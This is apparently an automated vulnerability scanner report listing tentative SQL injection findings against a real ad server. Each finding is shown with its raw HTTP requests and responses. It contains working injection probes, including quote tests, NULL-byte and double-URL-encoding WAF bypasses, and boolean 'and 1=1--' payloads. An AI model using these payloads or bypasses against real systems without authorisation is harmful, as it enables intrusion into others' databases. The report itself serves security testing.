if (window.rm_crex_data) {rm_crex_data.push(8690940);}

1.2. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [JEB2 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID%00'; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2812308(i) {
var sVersion_2812308 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID%00''; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 592

document.write("\n");
var cb = Math.random();
var d = document;
var iframe = "&fr=" + (window != top);
var ref = "";
try {
if (window != top) {
ref = "&rf="+escape(d.referrer);
}
} catch (ignore) { }

...[SNIP]...

1.3. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH%2527;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2812308(i) {
var sVersion_2812308 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH%2527%2527;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 426

document.write("<scr"+"ipt src=\"http://tag.contextweb.com/TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934\">\n");
docum
...[SNIP]...

1.4. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816967(i) {
var sVersion_2816967 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1712

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.5. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1%00'
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816967(i) {
var sVersion_2816967 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1%00''
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 475

document.write('<a href="http://adserver.adtech.de/?adlink|327|2816967|0|168|AdId=6109713;BnId=3;itime=599414338;sub1=[subst];" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/17/Ad6109713S
...[SNIP]...

1.6. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [JEB2 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID'; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816968(i) {
var sVersion_2816968 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID''; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1710

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.7. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH

Issue detail

The loc parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the loc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982'%20and%201%3d1--%20 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18913

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ion\")\r\n"+
"end if";
window.execScript(sVersion_2816968, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://store.nike.com/gb/en_gb/?l=shop,pdp,ctr-inline/cid-300/pid-406900&cp=EUNS_OT_FBJUL11_UK6";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=468 height=60";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/NikeSeitiroUK_468x60.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick=false;
var AT_LAYERMANUALRESIZE = false;
var AT_BASE="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/"; // Nachladepfad fuer Flash Filme (http://.../)
var AT_IMAGE="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/NikeSeitiroUk_468x60.gif";
var AT_TEXT="";
var AT_ALTIMAGEWIDTH = "468";
var AT_ALTIMAGEHEIGHT = "60";
var AT_ZINDEX = "0";
var AT_WMODE = "opaque";
var AT_EXPANDABLE="false"; // width:100px;height:70px; Zus?tzlich Fakepopup an position 0x0 machen
var AT_FAKEPOPUP=false;
var AT_FAKEPOPUP_left=100;
var AT_FAKEPOPUP_top=100;
var AT_FAKEPOPUP_autoclose='';
var AT_FAKEPOPUP_start_opened=true;
var AT_CURRENTDOMAIN= window.location.host;
var AT_VARSTRING;
//make variable names unique on page
var AT_MULTICLICK2816968=AT_MULTICLICK;
var AT_CLICK2816968=AT_CLICK;
var AT_TARGET2816968=AT_TARGET;
var AT_IMGCLICK2816968=AT_IMGCLICK;
AT_CLICKVAR[0]=AT_CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|327|2816968|
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982'%20and%201%3d2--%20 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ion\")\r\n"+
"end if";
window.execScript(sVersion_2816968, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://www.barclays.co.uk/footballoffset";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=468 height=60";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/OffsetMortgage_route1_468x60_v4.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick=false;
var AT_LAYERMANUALRESIZE = false;
var AT_BASE="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/"; // Nachladepfad fuer Flash Filme (http://.../)
var AT_IMAGE="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/OffsetMortgage_route1_468x60_Backup.gif";
var AT_TEXT="";
var AT_ALTIMAGEWIDTH = "468";
var AT_ALTIMAGEHEIGHT = "60";
var AT_ZINDEX = "0";
var AT_WMODE = "opaque";
var AT_EXPANDABLE="false"; // width:100px;height:70px; Zus?tzlich Fakepopup an position 0x0 machen
var AT_FAKEPOPUP=false;
var AT_FAKEPOPUP_left=100;
var AT_FAKEPOPUP_top=100;
var AT_FAKEPOPUP_autoclose='';
var AT_FAKEPOPUP_start_opened=true;
var AT_CURRENTDOMAIN= window.location.host;
var AT_VARSTRING;
//make variable names unique on page
var AT_MULTICLICK2816968=AT_MULTICLICK;
var AT_CLICK2816968=AT_CLICK;
var AT_TARGET2816968=AT_TARGET;
var AT_IMGCLICK2816968=AT_IMGCLICK;
AT_CLICKVAR[0]=AT_CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|327|2816968|0|1|AdId=6109710;BnId=115;
...[SNIP]...

1.8. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH'%20and%201%3d1--%20;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 427

e9 = new Object();
e9.size = "300x250";
document.write("\n");
document.write("<scr"+"ipt type=\"text/javascript\" src=\"http://tags.expo9.exponential.com/tags/Premierleaguecom/ROS/tags.js\">\n");
document.write("</scr"+"ipt>\n");

var adcount_2816969_1_=new Image();
adcount_2816969_1_.src="http://adserver.adtech.de/adcount|2.0|327|2816969|0|170|AdId=6638640;BnId=2;ct=2204870089;st=783;adcid=1;itime=599386577;reqtype=5;";

Request 2

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH'%20and%201%3d2--%20;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN");
       span.innerHTML = __ADTECH_CODE__;
       window.frameElement.parentNode.appendChild(span);
       __bCodeFlushed = true;
   }
}

if (typeof inFIF != "undefined") {
   document.write = function(str) {
       __ADTECH_CODE__ += str;
   };
   
   document.writeln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816969(i) {
var sVersion_2816969 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"swVersion_ = swControl_.GetVariable(\"$version\")\r\n"+
"end if";
window.execScript(sVersion_2816969, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://www.barclays.co.uk/footballoffset";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=300 height=250";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz170Sq101119310V0Id116/OffsetMortgage_route1_300x250_v7.swf";
